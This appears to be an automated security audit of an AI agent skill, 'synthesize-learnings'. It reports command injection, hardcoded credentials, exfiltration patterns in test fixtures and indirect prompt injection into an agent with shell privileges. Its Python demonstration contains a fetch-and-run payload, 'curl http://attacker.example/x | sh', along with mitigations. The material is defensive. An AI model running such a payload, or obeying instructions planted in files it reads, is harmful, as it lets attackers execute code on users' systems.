synthesize-learnings

Fail

Audited by Gen Agent Trust Hub on Mar 16, 2026

Risk Level: HIGH
COMMAND_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE, PROMPT_INJECTION, REMOTE_CODE_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The mine-plugins.md and mine-skill.md commands interpolate user-provided arguments directly into shell command strings (python3 ... --path "$ARGUMENTS"). Because $ARGUMENTS is substituted as text before the shell parses the line, the surrounding double quotes do not protect it: an argument containing a closing quote followed by ; or $(...) ends the intended command and appends an attacker-chosen one. This pattern is susceptible to command injection unless the input is strictly validated or escaped before execution.
  • [CREDENTIALS_UNSAFE]: The test file tests/flawed-plugin/scripts/bad_script.py contains hardcoded credentials, including an Authorization header and an API key constructed through string concatenation, demonstrating unsafe secret handling.
  • [DATA_EXFILTRATION]: Files in the tests/flawed-plugin/ directory demonstrate patterns for data exposure and exfiltration, such as reading the DATABASE_PASSWORD environment variable and transmitting data to external servers using requests.post and curl.
  • [PROMPT_INJECTION]: The skill architecture is vulnerable to indirect prompt injection because it ingests untrusted code from third-party plugins (ingestion points: SKILL.md Step 3, mine-plugins.md Step 3) without sanitization or boundary markers. Combined with high-privilege capabilities (Bash and Write tools in agents/l5-red-team-auditor.md), instructions embedded in analyzed files can be acted on by the agent with those privileges and compromise it.
  • [REMOTE_CODE_EXECUTION]: The skill includes patterns for fetching specifications dynamically from remote URLs, and its test fixtures issue remote requests. If those sources are untrusted or the execution logic is flawed, fetched content could be leveraged to execute arbitrary code.
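The COMMAND_EXECUTION finding above is easiest to see with a concrete rendering. The following is an added example, not code from the audited skill or from the audit tool: it assumes a template of the shape the finding quotes (the script path scripts/mine.py and the attacker string are stand-ins constructed for this illustration), shows that textual substitution of $ARGUMENTS lets a quote-and-semicolon payload introduce extra shell operators, and contrasts two mitigations: quoting the argument with shlex.quote, and avoiding the shell entirely by passing an argv list to subprocess.

```python
import shlex
import subprocess
import sys

# Assumed shape of the audited command template (the script path is a stand-in,
# not the repository's real file name).
TEMPLATE = 'python3 scripts/mine.py --path "$ARGUMENTS"'

# Constructed attacker-controlled argument: closes the template's double quote,
# chains further commands, then re-opens a quote so the line still parses.
MALICIOUS_ARGS = '/tmp/plugins"; curl http://attacker.example/x | sh; echo "'

# Tokens that, once present outside quotes, start a second command or redirect.
SHELL_OPERATORS = {";", "|", "||", "&", "&&", "(", ")", "<", ">", ">>"}


def naive_render(template: str, arguments: str) -> str:
    """Plain textual substitution of $ARGUMENTS: the behaviour the audit flags."""
    return template.replace("$ARGUMENTS", arguments)


def quoted_render(template: str, arguments: str) -> str:
    """Hardened variant: drop the template's own quotes and wrap the whole
    argument with shlex.quote, so the shell always sees exactly one word."""
    return template.replace('"$ARGUMENTS"', shlex.quote(arguments))


def shell_tokens(command: str) -> list:
    """Tokenize a command line the way a POSIX shell would, keeping operators
    such as ';' and '|' as their own tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def has_shell_operators(command: str) -> bool:
    """True if the rendered line contains an unquoted shell operator, i.e. the
    argument escaped the single word it was meant to occupy."""
    return any(tok in SHELL_OPERATORS for tok in shell_tokens(command))


def run_with_argv(arguments: str) -> str:
    """Safest form: no shell at all. argv is a list, so the argument reaches the
    child unchanged whatever it contains. The current Python interpreter stands
    in for the audited script and simply echoes its first argument back."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", arguments],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


if __name__ == "__main__":
    naive = naive_render(TEMPLATE, MALICIOUS_ARGS)
    quoted = quoted_render(TEMPLATE, MALICIOUS_ARGS)
    print("naive :", naive)
    print("  operators injected:", has_shell_operators(naive))
    print("quoted:", quoted)
    print("  operators injected:", has_shell_operators(quoted))
    print("argv roundtrip intact:", run_with_argv(MALICIOUS_ARGS) == MALICIOUS_ARGS)
```

shlex.quote is the right tool only when a shell string is unavoidable; when the command is issued from code rather than from a prompt template, the argv-list form removes the shell parser from the path altogether, and the tokenizer check above can serve as a pre-execution guard for the cases where the template form must stay.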
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 16, 2026, 03:13 PM